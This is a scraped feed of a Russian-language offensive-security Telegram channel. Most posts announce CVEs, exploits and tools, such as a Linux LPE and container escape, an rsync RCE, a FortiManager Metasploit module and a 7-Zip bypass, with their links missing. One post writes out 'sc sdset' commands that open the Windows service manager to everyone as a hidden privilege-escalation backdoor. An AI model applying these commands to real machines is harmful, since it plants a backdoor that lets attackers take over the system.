

11.02.202508:03
опа
22.01.202517:59
21.01.202505:35
Kirishning iloji bo'lmadi
media kontentga
media kontentga
16.11.202421:01
С днем рождения !!!!
Сегодня Proxy Bar исполняется 3 года
***
Много воды утекло, но вектор канала сохранился, изменения коснулись чата группы, а именно:
# был перестроен чат
# набралась команда админов (хорошие специалисты и прекрасные люди)
# В рамках чата начали формироваться конкурсы и авторские статьи (+ source code)
*
Ну и по поводу дня рождения хотим поделиться в Вами некоторыми нашими сервисами:
заходите на proxy-bar.org там есть краткое описание, из основного
это секция Soft, Send, Secnote, PrivateBin, Jabber (много кто просил) и библиотека
*
С праздником, и Вас и Нас ! 😜
*
Если Вам нравится то что мы делаем, Вы можете нас поддержать:
***
Donate:
Bitcoin bc1qmrt229eghjyj9wqa7nmr9j8zuq6khz6km2pker
#lденьрождения #админы #всевсевсе
Сегодня Proxy Bar исполняется 3 года
***
Много воды утекло, но вектор канала сохранился, изменения коснулись чата группы, а именно:
# был перестроен чат
# набралась команда админов (хорошие специалисты и прекрасные люди)
# В рамках чата начали формироваться конкурсы и авторские статьи (+ source code)
*
Ну и по поводу дня рождения хотим поделиться в Вами некоторыми нашими сервисами:
заходите на proxy-bar.org там есть краткое описание, из основного
это секция Soft, Send, Secnote, PrivateBin, Jabber (много кто просил) и библиотека
*
С праздником, и Вас и Нас ! 😜
*
Если Вам нравится то что мы делаем, Вы можете нас поддержать:
***
Donate:
Bitcoin bc1qmrt229eghjyj9wqa7nmr9j8zuq6khz6km2pker
#lденьрождения #админы #всевсевсе


14.11.202409:11
Zero-Day CVE-2024-43451 One click
*
Прикольно конечно, идешь так по URL на сайт правительства (lol 1) Украины (lol 2) для получения академических сертификатов, клац правой кнопочкой и получаешь модный
А кто ходит на сайт правительства Украины за сертификатами ? Правильно - украинские организации.
Ну дальше все понятно.
В зайце — утка, в утке — яйцо, в яйце игла — смерть
ZIP, а в нем PDF, диплом и URL, где URL дергает сплоит и уводит на C&C кого надо.
А надо видимо господам из
*
Прикольно конечно, идешь так по URL на сайт правительства (lol 1) Украины (lol 2) для получения академических сертификатов, клац правой кнопочкой и получаешь модный
URL
на 0Day
.А кто ходит на сайт правительства Украины за сертификатами ? Правильно - украинские организации.
Ну дальше все понятно.
ZIP, а в нем PDF, диплом и URL, где URL дергает сплоит и уводит на C&C кого надо.
А надо видимо господам из
UAC-0194
))))Kirishning iloji bo'lmadi
media kontentga
media kontentga
11.11.202415:50
From Tito to Stalin
*
An In-Memory Rootkit For Linux
*
Tito
*
An In-Memory Rootkit For Linux
*
Tito


05.02.202519:37
CVE-2024-36972
*
Два в одном !
Linux
*
vulnerability affects Linux kernel versions:
v6.8 to v6.9
v5.15.147
v6.1.78
v6.6.17
POC exploit
#Linux #lpe #container #escape
*
Два в одном !
Linux
LPE
and Container Escape
*
vulnerability affects Linux kernel versions:
v6.8 to v6.9
v5.15.147
v6.1.78
v6.6.17
POC exploit
#Linux #lpe #container #escape
22.01.202509:36


16.01.202518:38
Kirishning iloji bo'lmadi
media kontentga
media kontentga
15.11.202418:54
CVE-2024-47575 FortiManager
*
Удивительно быстро ушел push, да еще и заапрувили в
Но так или иначе модуль есть, жми
*
Pull Req
#fortinet #metasploit
*
Удивительно быстро ушел push, да еще и заапрувили в
metasploit-framework
Но так или иначе модуль есть, жми
msfupdate
))*
Pull Req
#fortinet #metasploit
12.11.202420:52
Citrix Virtual Apps and Desktops (XEN)
*
Unauthenticated Remote Code execution
*
exploit
*
Unauthenticated Remote Code execution
*
exploit


23.01.202509:16
22.01.202506:01
CVE-2024-12084 Rsync
Переполнение буфера кучи: возникает из-за неправильной обработки длины контрольных сумм в демоне Rsync, что приводит к записи за пределами буфера. Затрагивает версии от 3.2.7 до < 3.4.0 и может привести к RCE.
*
POC
Переполнение буфера кучи: возникает из-за неправильной обработки длины контрольных сумм в демоне Rsync, что приводит к записи за пределами буфера. Затрагивает версии от 3.2.7 до < 3.4.0 и может привести к RCE.
*
POC
16.01.202511:46


15.11.202412:52
Шифруем payload с помощью алгоритма DFC (Decorrelated Fast Cipher)
*
WriteUP SourceCode Demo
*
WriteUP SourceCode Demo


12.11.202403:58
CVE-2024-50340 - Adapted EOS Exploit
*
CVE-2024-4985 / CVE-2024-9487 - GitHub Enterprise SAML Authentication Bypass exploit
*
CVE-2024-4985 / CVE-2024-9487 - GitHub Enterprise SAML Authentication Bypass exploit


01.11.202404:08
CVE-2024-39205
*
Pyload (работающий под управлением Python3.11 или ниже) уязвим к RCE
*
Exploit
*
Pyload (работающий под управлением Python3.11 или ниже) уязвим к RCE
*
Exploit
23.01.202505:00
CVE-2025-0411
7-Zip Mark-of-the-Web Bypass Vulnerability
*
POC
7-Zip Mark-of-the-Web Bypass Vulnerability
*
POC
21.01.202515:50
16.01.202509:15


09.09.202409:59
Легальный и малозаметный LPE backdoor в WiNd0z
*
Разрешаем удаленное использование Services.msc
#win #backdoor
*
Разрешаем удаленное использование Services.msc
sc sdset SCMANAGER D:(A;;CCLCRPRC;;;AU)(A;;CCLCRPWPRC;;;SY)(A;;KA;;;BA)S:(AU;FA;KA;;;WD)(AU;OIIOFA;GA;;;WD)
sc.exe sdset scmanager D:(A;;KA;;;WD)
#win #backdoor
Ko'rsatilgan 1 - 24 dan 24
Ko'proq funksiyalarni ochish uchun tizimga kiring.